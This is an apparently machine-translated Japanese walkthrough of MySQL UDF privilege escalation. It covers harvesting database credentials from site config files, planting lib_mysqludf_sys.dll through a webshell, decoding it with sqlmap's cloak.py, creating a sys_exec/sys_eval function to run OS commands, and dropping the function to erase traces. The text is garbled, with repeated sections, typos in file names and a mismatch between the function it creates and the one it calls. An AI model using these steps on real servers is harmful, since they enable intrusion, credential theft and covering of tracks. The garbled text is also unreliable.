UDF
文書ディレクトリ一、収集情報 二、MySQLバージョンは5.1より高く、フォルダ を作成三、UDFを導入する.LL 4.実行コマンド 5.クリアマーク 一、情報収集
Webサイトのプロファイルを表示してデータベースのアカウントとパスワードを取得します(ここではmysqlデータベースを示します)データベースプロファイル:conn、config、data、sql、common、incなどのデータベースディレクトリファイル:インストールディレクトリ/data/mysql/user.mydとuser.frm(user.mydはmysqlデータベースのuserテーブルの内容、user、frmはuserテーブルのカラム名)
二、MySQLバージョンは5.1より高く、フォルダを作成する
MySQLバージョンは5.1より高く、lib/pluginディレクトリ自体は存在しません.webshellでmysqlインストールパスの下にlib/pluginを作成し、udfをインポートする必要があります.dll(mysqlのビット数に基づいてudf.llをインポート)
MySQLバージョンは5.1未満、udf.dllファイルはwindows server 2003の下でc:windowssystem 32ディレクトリに配置され、windows server 2000の下でc:wintsystem 32ディレクトリに配置される
三、UDFを導入する.LL
SQLmapはdllファイルのエクスポートを実現し、ディレクトリはsqlmap/udf/mysql/windows(ここで32ビット/64ビット、mysqlのビット数を指す)で、ビット数が間違っているとエラーが報告されます.SQLmapのduf.dllは、符号化使用sqlmap/extra/cloakディレクトリの下のcloakである.py復号
dllファイルをmysqlの/lib/pluginディレクトリにアップロードする:sys_を作成するexec関数
四.コマンドの実行
五.跡を消す
Webサイトのプロファイルを表示してデータベースのアカウントとパスワードを取得します(ここではmysqlデータベースを示します)データベースプロファイル:conn、config、data、sql、common、incなどのデータベースディレクトリファイル:インストールディレクトリ/data/mysql/user.mydとuser.frm(user.mydはmysqlデータベースのuserテーブルの内容、user、frmはuserテーブルのカラム名)
select version(); //
select user(); //
select @@basedir; //
show variables like "%char%"; // mysql
select @@version_compile_os; // mysql
二、MySQLバージョンは5.1より高く、フォルダを作成する
MySQLバージョンは5.1より高く、lib/pluginディレクトリ自体は存在しません.webshellでmysqlインストールパスの下にlib/pluginを作成し、udfをインポートする必要があります.dll(mysqlのビット数に基づいてudf.llをインポート)
MySQLバージョンは5.1未満、udf.dllファイルはwindows server 2003の下でc:windowssystem 32ディレクトリに配置され、windows server 2000の下でc:wintsystem 32ディレクトリに配置される
三、UDFを導入する.LL
SQLmapはdllファイルのエクスポートを実現し、ディレクトリはsqlmap/udf/mysql/windows(ここで32ビット/64ビット、mysqlのビット数を指す)で、ビット数が間違っているとエラーが報告されます.SQLmapのduf.dllは、符号化使用sqlmap/extra/cloakディレクトリの下のcloakである.py復号
cloak.py -d -i D:\sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_
dllファイルをmysqlの/lib/pluginディレクトリにアップロードする:sys_を作成するexec関数
create function sys_exec returns string soname "lib_mysqludf_sys.dll";
四.コマンドの実行
select sys_eval ('whoami');
五.跡を消す
drop function sys_eval; //